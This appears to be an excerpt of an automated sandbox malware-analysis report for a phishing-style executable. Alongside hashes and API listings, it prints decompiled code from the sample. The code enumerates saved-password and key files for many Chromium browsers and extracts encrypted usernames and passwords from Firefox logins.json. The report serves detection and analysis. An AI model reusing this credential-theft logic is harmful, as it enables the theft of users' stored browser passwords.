Instruction ID: 9cd5b6b4c5dca6d41926e45ffb074c55d13092f3107da79fccde50067df1e1ee
Opcode Fuzzy Hash: d78cc4295d52db4797c881869a1189b922bd79d2764b87299d2aea29d8ed4cf0
Instruction Fuzzy Hash: 27410070D10218CFDB24CFA9C984BCEBBF5BF89304F208469D408AB254DB746946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02E93070, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 02E93131

Memory Dump Source

Source File: 00000000.00000002.326956265.0000000002E90000.00000040.00000001.sdmp, Offset: 02E90000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 4d7b7927405fc7753c840e9e4e3ad781b418fa297764d10fba934ca7e7df88ee
Instruction ID: 813f9066d20f6837b9fd38ba153761070bcbd1332287930ed193ba913a9ac3f0
Opcode Fuzzy Hash: 4d7b7927405fc7753c840e9e4e3ad781b418fa297764d10fba934ca7e7df88ee
Instruction Fuzzy Hash: 254109B8A002058FDB14CF99C848AABBBF5FF88314F24C599D419A7361D774A841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0121C610, Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0121C69F

Memory Dump Source

Source File: 00000000.00000002.326514389.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: cbfbc8cf214d94a0ebad80fed985fd37b72dc9ceb6648063b7a410efd41eda65
Instruction ID: a726da31f44078f7f3530d2a78afcf09557de050cc919eb592cd4d43fc23a611
Opcode Fuzzy Hash: cbfbc8cf214d94a0ebad80fed985fd37b72dc9ceb6648063b7a410efd41eda65
Instruction Fuzzy Hash: 1B2107B5D10248DFDB10CFA9D984ADEBFF8EB58314F14841AE914A3310D378A955CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0121C618, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0121C69F

Memory Dump Source

Source File: 00000000.00000002.326514389.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8a56ab71ae9c1e2243100e68bdb237272b00e310a38caa45be6cf6640822140a
Instruction ID: 907b50d7db4ffb99ed6c0709d7b5edcb64f3a54af97e0d7f440829a270c00359
Opcode Fuzzy Hash: 8a56ab71ae9c1e2243100e68bdb237272b00e310a38caa45be6cf6640822140a
Instruction Fuzzy Hash: CC21D3B5910259DFDB10CFAAD984ADEBFF8FB48324F14841AE914A3310D378A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0121A551, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0121A3B1,00000800,00000000,00000000), ref: 0121A5C2

Memory Dump Source

Source File: 00000000.00000002.326514389.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 14557c4f9657add59773dab6cc454579246d8a4daf6d0ce8c3c00f8953bc29ca
Instruction ID: 88631c82c3904149dcecf0b328da0a9ff619e6098ff238cb72168f2d366bc77a
Opcode Fuzzy Hash: 14557c4f9657add59773dab6cc454579246d8a4daf6d0ce8c3c00f8953bc29ca
Instruction Fuzzy Hash: 931144B6C002499FDB10CF9AD444ADEFBF8AB98324F14842AD525A7200C378A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01219460, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0121A3B1,00000800,00000000,00000000), ref: 0121A5C2

Memory Dump Source

Source File: 00000000.00000002.326514389.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 034aeb228c3c548bf03f285ad16e4c0d54650a8ff7592f1d5f82601f6692e876
Instruction ID: 7205ce49f718eb6dc9d38ae480f7b49cd3e680bda05e5a82e3b9bd9a9cfee946
Opcode Fuzzy Hash: 034aeb228c3c548bf03f285ad16e4c0d54650a8ff7592f1d5f82601f6692e876
Instruction Fuzzy Hash: DF1126B6D143499FDB10CF9AD444ADEFBF8EB98324F14842AE525A7200C378A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0121A2D0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0121A336

Memory Dump Source

Source File: 00000000.00000002.326514389.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 0c4bd7762437959522f624d1eb842d434518ef1308260c32828567503b7e90a3
Instruction ID: 4d0466db8bcaec943eed60008773a504e8e0804e26fa08e2b3d95dfc03e1f37c
Opcode Fuzzy Hash: 0c4bd7762437959522f624d1eb842d434518ef1308260c32828567503b7e90a3
Instruction Fuzzy Hash: 9011DFB5C006498FDB10CF9AD544BDEFBF4AF89224F14852AD529A7600C378A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02E90CF8, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 02E90D5D

Memory Dump Source

Source File: 00000000.00000002.326956265.0000000002E90000.00000040.00000001.sdmp, Offset: 02E90000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 4d4662b6325b404256ab4e9502e5bf5cfd0565978f73eea1eca4a38b1938793b
Instruction ID: 9a320c9d61ed1bd119659b6ada7a52790e776907f4120dd61d9912eae38d75dc
Opcode Fuzzy Hash: 4d4662b6325b404256ab4e9502e5bf5cfd0565978f73eea1eca4a38b1938793b
Instruction Fuzzy Hash: E71118B59002498FDB10CF99D585BDFBFF4EB88324F24855AE854A7310C378A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02E90D00, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 02E90D5D

Memory Dump Source

Source File: 00000000.00000002.326956265.0000000002E90000.00000040.00000001.sdmp, Offset: 02E90000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 4eef7b36cdd9ee0b91d6676781a6af08fbafb5d8e14168bf1aa7aa6695db08f5
Instruction ID: 11f8e7618f179a25ed2b24f421b6a6348b36e5e6ddb909020b8c6bf4a65b9b35
Opcode Fuzzy Hash: 4eef7b36cdd9ee0b91d6676781a6af08fbafb5d8e14168bf1aa7aa6695db08f5
Instruction Fuzzy Hash: 8E1115B58002088FDB10CF99D585BDFBBF8EB48324F20841AD824A7300C374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0121F2D0, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.326514389.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da2c7cd3d6227a6de9907b1f137c889af1847644e28c24609f87c5dfe67883b3
Instruction ID: f0d06f6b64b8405230ef950348949df6dbb3372674815df9679687b5a4187b55
Opcode Fuzzy Hash: da2c7cd3d6227a6de9907b1f137c889af1847644e28c24609f87c5dfe67883b3
Instruction Fuzzy Hash: 091292F9411B668BE330CF65F99C1893BA1B745328F904309D2E22FAD9D7B8154ACF85

Uniqueness

Uniqueness Score: -1.00%

Function 0121CE74, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.326514389.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b1190b6907734cfbacd0bad3dc02058b75cc01ea6ebdc06cdc1af42e66af0f8
Instruction ID: 3f257a9f552ff469ff7270d7737224488f5d87b8700e3dc8851ec35c3bd63cbf
Opcode Fuzzy Hash: 7b1190b6907734cfbacd0bad3dc02058b75cc01ea6ebdc06cdc1af42e66af0f8
Instruction Fuzzy Hash: DFA19136E1021A8FCF05DFB9D8445DDBBF2FF94300B15856AE905AB269EB31E915CB80

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ADJUSTED PO3917NOV.exe PID: 1328 Parent PID: 5404 ADJUSTED PO3917NOV.exeCOMMON

Executed Functions

Function 0040C1B2, Relevance: 36.5, Strings: 29, Instructions: 218
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040C1B2(void* __edx, intOrPtr _a4) {
				char _v48;
				char _v56;
				char _v60;
				char _v324;
				intOrPtr _v328;
				char _v332;
				char _v336;
				char _v340;
				char _v344;
				intOrPtr _v352;
				void* _t31;
				intOrPtr* _t59;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t84;
				intOrPtr* _t86;
				intOrPtr* _t88;
				intOrPtr* _t90;
				intOrPtr* _t92;
				intOrPtr* _t94;
				intOrPtr* _t96;
				intOrPtr* _t98;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t108;
				intOrPtr* _t110;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t117;
				intOrPtr* _t120;
				intOrPtr _t126;
				void* _t134;
				void* _t135;
				intOrPtr _t139;
				signed int _t140;
				void* _t142;

				_t133 = __edx;
				_t142 = (_t140 & 0xfffffff8) - 0x34;
				_t72 = _a4;
				 *0x4196a4 = _t72;
				_t73 =  *((intOrPtr*)(_t72 + 4));
				E00413786(_t73, __edx,  &_v48,  *((intOrPtr*)(_t72 + 8)), 0); // executed
				_t143 = _v56;
				if(_v56 != 0) {
					_push(_t73);
					E0040304C(_t142,  &_v48);
					_t76 =  *0x4196a4; // 0x15ac4d0
					E00409FB3( *_t76, _t133, _t73);
					_t78 =  *0x4196a4; // 0x15ac4d0
					_t31 = E00409FDA( *_t78, _t143);
					_t144 = _t31;
					if(_t31 != 0) {
						_t134 = 0x1a;
						E0040F76B( &_v56, _t134, _t144); // executed
						_t135 = 0x1a;
						E0040F76B( &_v60, _t135, _t144);
						_t84 =  *0x4196a4; // 0x15ac4d0
						E0040C4A8( *_t84, _t144, L"\\Google\\Chrome\\User Data\\Default\\Login Data", L"\\Google\\Chrome\\User Data\\Local State", 0, 0, 1);
						_t86 =  *0x4196a4; // 0x15ac4d0
						E0040C4A8( *_t86, _t144, L"\\Epic Privacy Browser\\User Data\\Default\\Login Data", L"\\Epic Privacy Browser\\User Data\\Local State", 0, 0, 6);
						_t88 =  *0x4196a4; // 0x15ac4d0
						E0040C4A8( *_t88, _t144, L"\\Microsoft\\Edge\\User Data\\Default\\Login Data", L"\\Microsoft\\Edge\\User Data\\Local State", 0, 0, 7);
						_t90 =  *0x4196a4; // 0x15ac4d0
						E0040C4A8( *_t90, _t144, L"\\UCBrowser\\User Data_i18n\\Default\\UC Login Data.17", L"\\UCBrowser\\User Data_i18n\\Local State", 0, 1, 8);
						_t92 =  *0x4196a4; // 0x15ac4d0
						E0040C4A8( *_t92, _t144, L"\\Tencent\\QQBrowser\\User Data\\Default\\Login Data", L"\\Tencent\\QQBrowser\\User Data\\Local State", 0, 0, 9);
						_t94 =  *0x4196a4; // 0x15ac4d0
						E0040C4A8( *_t94, _t144, L"\\Opera Software\\Opera Stable\\Login Data", L"\\Opera Software\\Opera Stable\\Local State", 1, 0, 0xa);
						_t96 =  *0x4196a4; // 0x15ac4d0
						E0040C4A8( *_t96, _t144, L"\\Blisk\\User Data\\Default\\Login Data", L"\\Blisk\\User Data\\Local State", 0, 0, 0xb);
						_t98 =  *0x4196a4; // 0x15ac4d0
						E0040C4A8( *_t98, _t144, L"\\Chromium\\User Data\\Default\\Login Data", L"\\Chromium\\User Data\\Local State", 0, 0, 0xc);
						_t100 =  *0x4196a4; // 0x15ac4d0
						E0040C4A8( *_t100, _t144, L"\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data", L"\\BraveSoftware\\Brave-Browser\\User Data\\Local State", 0, 0, 0xd); // executed
						_t102 =  *0x4196a4; // 0x15ac4d0
						E0040C4A8( *_t102, _t144, L"\\Vivaldi\\User Data\\Default\\Login Data", L"\\Vivaldi\\User Data\\Local State", 0, 0, 0xe);
						_t104 =  *0x4196a4; // 0x15ac4d0
						E0040C4A8( *_t104, _t144, L"\\Comodo\\Dragon\\User Data\\Default\\Login Data", L"\\Comodo\\Dragon\\User Data\\Local State", 0, 0, 0xf);
						_t106 =  *0x4196a4; // 0x15ac4d0
						E0040C4A8( *_t106, _t144, L"\\Torch\\User Data\\Default\\Login Data", L"\\Torch\\User Data\\Local State", 0, 0, 0x10);
						_t108 =  *0x4196a4; // 0x15ac4d0
						E0040C4A8( *_t108, _t144, L"\\Slimjet\\User Data\\Default\\Login Data", L"\\Slimjet\\User Data\\Local State", 0, 0, 0x11);
						_t110 =  *0x4196a4; // 0x15ac4d0
						E0040C4A8( *_t110, _t144, L"\\CentBrowser\\User Data\\Default\\Login Data", L"\\CentBrowser\\User Data\\Local State", 0, 0, 0x12);
						_t112 =  *0x4196a4; // 0x15ac4d0
						E0040B203( *_t112, _t135, _t144);
						_t114 =  *0x4196a4; // 0x15ac4d0
						E0040A0D8( *_t114, _t135, _t144); // executed
						E0040362D(_t142,  &_v340);
						_t117 =  *0x4196a4; // 0x15ac4d0
						E0040A6C8( *_t117, _t144,  *_t114); // executed
						E0040362D(_t142,  &_v344);
						_t120 =  *0x4196a4; // 0x15ac4d0
						E0040AC0A( *_t120, _t144,  *_t117);
						E00409F71(_t144);
						_t59 =  *0x4196a4; // 0x15ac4d0
						E00402093( &_v340, _t144,  *_t59);
						_v328 = 0x4174a4;
						E00402093( &_v324, _t144,  &_v344);
						_t126 =  *0x4196a4; // 0x15ac4d0
						E00404F2B( *((intOrPtr*)(_t126 + 8)),  &_v332); // executed
						E004133F4( &_v336);
						_t129 = _v352;
						if(_v352 != 0) {
							E00401A7E(_t129, _t129);
						}
						_t66 =  *0x4196a4; // 0x15ac4d0
						_t67 =  *_t66;
						_t130 =  *((intOrPtr*)(_t67 + 0x10));
						if( *((intOrPtr*)(_t67 + 0x10)) != 0) {
							L00405EA5(_t130);
						}
						L00405EA5(_v60);
						L00405EA5(_v56);
					}
					_t80 =  *0x4196a4; // 0x15ac4d0
					_t139 =  *_t80;
					E00405EEE(_t80);
					_t22 = _t139 + 0x24; // 0x24
					E00401F76(_t22);
				}
				E00403036( &_v48);
				return 0;
			}

0x0040c1b2
0x0040c1b8
0x0040c1bb
0x0040c1c5
0x0040c1cf
0x0040c1d3
0x0040c1d8
0x0040c1dc
0x0040c1e2
0x0040c1eb
0x0040c1f0
0x0040c1f8
0x0040c1fd
0x0040c205
0x0040c20a
0x0040c20c
0x0040c214
0x0040c219
0x0040c220
0x0040c225
0x0040c22a
0x0040c240
0x0040c245
0x0040c25b
0x0040c260
0x0040c276
0x0040c27b
0x0040c292
0x0040c297
0x0040c2ad
0x0040c2b2
0x0040c2c9
0x0040c2ce
0x0040c2e4
0x0040c2e9
0x0040c2ff
0x0040c304
0x0040c31a
0x0040c321
0x0040c335
0x0040c33a
0x0040c350
0x0040c355
0x0040c36b
0x0040c370
0x0040c386
0x0040c38b
0x0040c3a1
0x0040c3a6
0x0040c3ae
0x0040c3b3
0x0040c3bb
0x0040c3c8
0x0040c3cd
0x0040c3d5
0x0040c3e2
0x0040c3e7
0x0040c3ef
0x0040c3fc
0x0040c401
0x0040c40c
0x0040c415
0x0040c422
0x0040c427
0x0040c435
0x0040c43e
0x0040c443
0x0040c449
0x0040c44c
0x0040c44c
0x0040c451
0x0040c456
0x0040c458
0x0040c45d
0x0040c45f
0x0040c45f
0x0040c468
0x0040c471
0x0040c471
0x0040c476
0x0040c47c
0x0040c47e
0x0040c483
0x0040c486
0x0040c486
0x0040c48f
0x0040c49a

Strings

\Slimjet\User Data\Default\Login Data, xrefs: 0040C381
\CentBrowser\User Data\Default\Login Data, xrefs: 0040C39C
\Blisk\User Data\Default\Login Data, xrefs: 0040C2DF
\Epic Privacy Browser\User Data\Local State, xrefs: 0040C251
\Vivaldi\User Data\Default\Login Data, xrefs: 0040C330
\Comodo\Dragon\User Data\Local State, xrefs: 0040C346
\Microsoft\Edge\User Data\Local State, xrefs: 0040C26C
\BraveSoftware\Brave-Browser\User Data\Local State, xrefs: 0040C310
\Opera Software\Opera Stable\Login Data, xrefs: 0040C2C4
\Vivaldi\User Data\Local State, xrefs: 0040C329
\Opera Software\Opera Stable\Local State, xrefs: 0040C2BF
\Tencent\QQBrowser\User Data\Default\Login Data, xrefs: 0040C2A8
\Blisk\User Data\Local State, xrefs: 0040C2DA
\Slimjet\User Data\Local State, xrefs: 0040C37C
\Chromium\User Data\Default\Login Data, xrefs: 0040C2FA
\Google\Chrome\User Data\Local State, xrefs: 0040C236
\Epic Privacy Browser\User Data\Default\Login Data, xrefs: 0040C256
\UCBrowser\User Data_i18n\Local State, xrefs: 0040C288
\Tencent\QQBrowser\User Data\Local State, xrefs: 0040C2A3
\Google\Chrome\User Data\Default\Login Data, xrefs: 0040C23B
\Chromium\User Data\Local State, xrefs: 0040C2F5
\Torch\User Data\Local State, xrefs: 0040C361
\Torch\User Data\Default\Login Data, xrefs: 0040C366
\CentBrowser\User Data\Local State, xrefs: 0040C397
\UCBrowser\User Data_i18n\Default\UC Login Data.17, xrefs: 0040C28D
\Comodo\Dragon\User Data\Default\Login Data, xrefs: 0040C34B
\BraveSoftware\Brave-Browser\User Data\Default\Login Data, xrefs: 0040C315
,%@, xrefs: 0040C415
\Microsoft\Edge\User Data\Default\Login Data, xrefs: 0040C271

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FilePath$lstrcatlstrcpy$BinaryCopyExistsOpenType$CloseCombineEnumFolderInfoPrivateProfileQuerySpecialString
String ID: ,%@$\Blisk\User Data\Default\Login Data$\Blisk\User Data\Local State$\BraveSoftware\Brave-Browser\User Data\Default\Login Data$\BraveSoftware\Brave-Browser\User Data\Local State$\CentBrowser\User Data\Default\Login Data$\CentBrowser\User Data\Local State$\Chromium\User Data\Default\Login Data$\Chromium\User Data\Local State$\Comodo\Dragon\User Data\Default\Login Data$\Comodo\Dragon\User Data\Local State$\Epic Privacy Browser\User Data\Default\Login Data$\Epic Privacy Browser\User Data\Local State$\Google\Chrome\User Data\Default\Login Data$\Google\Chrome\User Data\Local State$\Microsoft\Edge\User Data\Default\Login Data$\Microsoft\Edge\User Data\Local State$\Opera Software\Opera Stable\Local State$\Opera Software\Opera Stable\Login Data$\Slimjet\User Data\Default\Login Data$\Slimjet\User Data\Local State$\Tencent\QQBrowser\User Data\Default\Login Data$\Tencent\QQBrowser\User Data\Local State$\Torch\User Data\Default\Login Data$\Torch\User Data\Local State$\UCBrowser\User Data_i18n\Default\UC Login Data.17$\UCBrowser\User Data_i18n\Local State$\Vivaldi\User Data\Default\Login Data$\Vivaldi\User Data\Local State
API String ID: 2377953819-628738739
Opcode ID: 155c323c9de1373e2ac066809baf1fd741a528492759f2aab7446b04b3c74a80
Instruction ID: 33a1bfa3a0cad1bb0e33785dc6f3568ed4cf5559e2641269e6d084d4c59330ea
Opcode Fuzzy Hash: 155c323c9de1373e2ac066809baf1fd741a528492759f2aab7446b04b3c74a80
Instruction Fuzzy Hash: 4B713230351200AFC714EB61DDA2EEA3769EFD6B14B10417EF1066B2E1CAB96C40CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC0A, Relevance: 28.4, APIs: 5, Strings: 11, Instructions: 406
filestringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040AC0A(intOrPtr __ecx, void* __eflags, char _a4) {
				int _v12;
				int _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				intOrPtr _v32;
				WCHAR* _v36;
				char _v40;
				char _v44;
				int _v48;
				int _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				long _v92;
				int _v96;
				intOrPtr _v100;
				char _v104;
				char _v108;
				char _v112;
				void* _v116;
				int _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				int _v156;
				char _v160;
				intOrPtr _v164;
				char _v180;
				char _v184;
				short _v704;
				short _v1224;
				void* _t154;
				char* _t165;
				void* _t167;
				int _t189;
				int _t190;
				int _t193;
				int _t207;
				WCHAR* _t215;
				void* _t217;
				int _t221;
				void* _t230;
				void* _t236;
				void* _t242;
				int _t281;
				int _t283;
				char* _t293;
				char* _t325;
				void* _t386;
				long _t389;
				intOrPtr _t391;
				intOrPtr _t392;
				WCHAR* _t393;
				int _t394;
				void* _t395;
				void* _t396;
				void* _t397;

				_t397 = __eflags;
				_t392 = __ecx;
				_v32 = __ecx;
				E004035E5( &_v24, L"Profile"); // executed
				_t281 = 0;
				E00401052( &_v1224, 0, 0x208);
				_t396 = _t395 + 0xc;
				_v92 = 0;
				_t389 = 0;
				E00401052( &_v704, 0, 0x104);
				_t385 =  &_v704;
				_t154 = E0040C118(L"firefox.exe",  &_v704, _t397); // executed
				if(_t154 != 0) {
					_t293 =  &_v44;
					E004035E5(_t293,  &_v704);
					lstrcatW( &_v704, L"\\firefox.exe");
					GetBinaryTypeW( &_v704,  &_v92);
					_t399 = _v92 - 6;
					_t165 =  &_v44;
					if(_v92 != 6) {
						_push(0);
					} else {
						_push(1);
					}
					_push(_t293);
					E0040362D(_t396, _t165);
					_t167 = E0040BA00(_t392, _t385, _t399);
					_t400 = _t167;
					if(_t167 != 0) {
						E0040346A( &_a4, _t385, _t400, L"\\Mozilla\\Firefox\\");
						E0040362D( &_v36,  &_a4);
						E0040346A( &_v36, _t385, _t400, L"profiles.ini");
						E00403437( &_v24, E004035E5( &_v40, L"Profile"));
						L00405EA5(_v40);
						E00403272( &_v24, _t385, _t400, _t281);
						while(GetPrivateProfileStringW(_v24, L"Path", _t281,  &_v1224, 0x104, _v36) != 0) {
							_t389 = _t389 + 1;
							_v40 = _t389;
							E00403437( &_v24, E004035E5( &_v96, L"Profile"));
							L00405EA5(_v96);
							_v96 = _t281;
							E00403272( &_v24, _t385, __eflags, _t389);
							E0040362D( &_v12,  &_a4);
							E0040346A( &_v12, _t385, __eflags,  &_v1224);
							E00403554( &_v12,  &_v28);
							_t189 =  *((intOrPtr*)(_t392 + 0x68))(_v28);
							__eflags = _t189;
							if(_t189 == 0) {
								_t190 =  *((intOrPtr*)(_t392 + 0x80))();
								_v156 = _t190;
								__eflags = _t190;
								if(_t190 == 0) {
									goto L7;
								} else {
									_t193 =  *((intOrPtr*)(_t392 + 0x7c))(_t190, 1, _t281);
									_t396 = _t396 + 0xc;
									__eflags = _t193;
									if(_t193 != 0) {
										goto L7;
									} else {
										E0040362D( &_v20,  &_v12);
										E0040346A( &_v20, _t385, __eflags, L"\\logins.json");
										_t386 = 0x1a;
										E0040F76B( &_v16, _t386, __eflags);
										E0040346A( &_v16, _t386, __eflags, "\\");
										_t385 = 8;
										E00403335( &_v16, __eflags, E004034A7( &_v56, _t385, __eflags));
										L00405EA5(_v56);
										_v56 = _t281;
										E0040346A( &_v16, _t385, __eflags, L".tmp");
										_t393 = _v16;
										_t390 = _v20;
										__eflags = CopyFileW(_v20, _t393, _t281);
										if(__eflags != 0) {
											E00403437( &_v20,  &_v16);
											_t390 = _v20;
										}
										E0040FECE( &_v184, __eflags);
										_t325 =  &_v180;
										E00403437(_t325,  &_v20);
										_push(_t325);
										_t207 = E00410192( &_v184, 0xc0000000);
										_t327 =  &_v184;
										__eflags = _t207;
										if(__eflags != 0) {
											_v52 = _t281;
											_v48 = _t281;
											E0040FE3D( &_v184, _t385,  &_v52, _v164, _t281);
											_t215 = E004033BF( &_v116, "encryptedUsername");
											_t217 = L00402F22( &_v52,  &_v160);
											_t385 = _t215;
											_t283 = L00409EB7(_t217, _t215, __eflags);
											_v120 = _t283;
											L00405EA5(_v160);
											_t336 = _v116;
											L00405EA5(_v116);
											__eflags = _t283;
											if(_t283 == 0) {
												_t281 = 0;
												__eflags = 0;
											} else {
												_t391 = _v32;
												_t281 = 0;
												__eflags = 0;
												_t394 = _v120;
												do {
													_v112 = 0;
													_v108 = 0;
													_v104 = 0;
													_t230 = E004033BF( &_v128, "hostname");
													L00409EF0( &_v88, L00402F22( &_v52,  &_v124), __eflags, _t230, _t394);
													L00405EA5(_v124);
													L00405EA5(_v128);
													_t236 = E004033BF( &_v136, "encryptedUsername");
													L00409EF0( &_v84, L00402F22( &_v52,  &_v132), __eflags, _t236, _t394);
													L00405EA5(_v132);
													L00405EA5(_v136);
													_t242 = E004033BF( &_v144, "encryptedPassword");
													_t385 = L00402F22( &_v52,  &_v140);
													L00409EF0( &_v80, _t244, __eflags, _t242, _t394);
													L00405EA5(_v140);
													L00405EA5(_v144);
													E0040B15E(_t391, __eflags, _v84,  &_v72);
													E0040B15E(_t391, __eflags, _v80,  &_v76);
													E00403437( &_v112, E0040309D( &_v88, __eflags,  &_v60));
													L00405EA5(_v60);
													_v60 = 0;
													E00403437( &_v108, E0040309D(E004033BF( &_v148, _v72), __eflags,  &_v64));
													L00405EA5(_v64);
													_v64 = 0;
													L00405EA5(_v148);
													E00403437( &_v104, E0040309D(E004033BF( &_v152, _v76), __eflags,  &_v68));
													L00405EA5(_v68);
													_v68 = 0;
													L00405EA5(_v152);
													_t396 = _t396 - 0x10;
													_v100 = 0;
													L00401F95(_t396,  &_v112);
													L00401FCB(_t391);
													L00405EA5(_v72);
													L00405EA5(_v76);
													L00405EA5(_v80);
													L00405EA5(_v84);
													L00405EA5(_v88);
													_t336 =  &_v112;
													E004013EF( &_v112);
													_t394 = _t394 - 1;
													__eflags = _t394;
												} while (_t394 != 0);
												_t393 = _v16;
												_t390 = _v20;
											}
											_t221 = PathFileExistsW(_t393);
											__eflags = _t221;
											if(_t221 != 0) {
												E0040362D(_t396,  &_v16);
												E0040FF0B(_t336);
											}
											 *((intOrPtr*)(_v32 + 0x84))(_v156);
											 *((intOrPtr*)(_v32 + 0x6c))();
											E00403036( &_v52);
											_t327 =  &_v184;
										}
										L0040FEED(_t327, __eflags);
										L00405EA5(_t393);
										_v16 = _t281;
										L00405EA5(_t390);
										_v20 = _t281;
										L00405EA5(_v28);
										L00405EA5(_v12);
										_t389 = _v40;
										_t392 = _v32;
									}
								}
							} else {
								L7:
								L00405EA5(_v28);
								L00405EA5(_v12);
							}
							_v12 = _t281;
						}
						E0040B9A9(_t392);
						_t281 = 1;
						L00405EA5(_v36);
					}
					L00405EA5(_v44);
				}
				L00405EA5(_v24);
				L00405EA5(_a4);
				return _t281;
			}

0x0040ac0a
0x0040ac16
0x0040ac20
0x0040ac23
0x0040ac2d
0x0040ac37
0x0040ac3c
0x0040ac3f
0x0040ac48
0x0040ac51
0x0040ac58
0x0040ac63
0x0040ac6b
0x0040ac78
0x0040ac7b
0x0040ac8c
0x0040ac9d
0x0040aca3
0x0040aca7
0x0040acaa
0x0040ad18
0x0040acac
0x0040acac
0x0040acac
0x0040acae
0x0040acb2
0x0040acb9
0x0040acbe
0x0040acc0
0x0040acce
0x0040acda
0x0040ace7
0x0040acfd
0x0040ad05
0x0040ad0e
0x0040b105
0x0040ad1b
0x0040ad24
0x0040ad30
0x0040ad38
0x0040ad41
0x0040ad44
0x0040ad50
0x0040ad5f
0x0040ad6b
0x0040ad73
0x0040ad77
0x0040ad79
0x0040ad90
0x0040ad96
0x0040ad9c
0x0040ad9e
0x00000000
0x0040ada0
0x0040ada4
0x0040ada7
0x0040adaa
0x0040adac
0x00000000
0x0040adae
0x0040adb5
0x0040adc2
0x0040adc9
0x0040adcd
0x0040adda
0x0040ade1
0x0040adee
0x0040adf6
0x0040ae03
0x0040ae06
0x0040ae0b
0x0040ae0e
0x0040ae1a
0x0040ae1c
0x0040ae25
0x0040ae2a
0x0040ae2a
0x0040ae33
0x0040ae3c
0x0040ae42
0x0040ae47
0x0040ae53
0x0040ae58
0x0040ae5e
0x0040ae60
0x0040ae70
0x0040ae74
0x0040ae77
0x0040ae84
0x0040ae95
0x0040ae9a
0x0040aea9
0x0040aeab
0x0040aeae
0x0040aeb3
0x0040aeb6
0x0040aebb
0x0040aebd
0x0040b090
0x0040b090
0x0040aec3
0x0040aec3
0x0040aec6
0x0040aec6
0x0040aec8
0x0040aecb
0x0040aed4
0x0040aed7
0x0040aeda
0x0040aedd
0x0040aef4
0x0040aefe
0x0040af06
0x0040af17
0x0040af2e
0x0040af38
0x0040af43
0x0040af54
0x0040af69
0x0040af6e
0x0040af7b
0x0040af86
0x0040af94
0x0040afa2
0x0040afb7
0x0040afbf
0x0040afc7
0x0040afe4
0x0040afec
0x0040aff7
0x0040affa
0x0040b01c
0x0040b024
0x0040b02f
0x0040b032
0x0040b037
0x0040b03a
0x0040b043
0x0040b04a
0x0040b052
0x0040b05a
0x0040b062
0x0040b06a
0x0040b072
0x0040b077
0x0040b07a
0x0040b07f
0x0040b07f
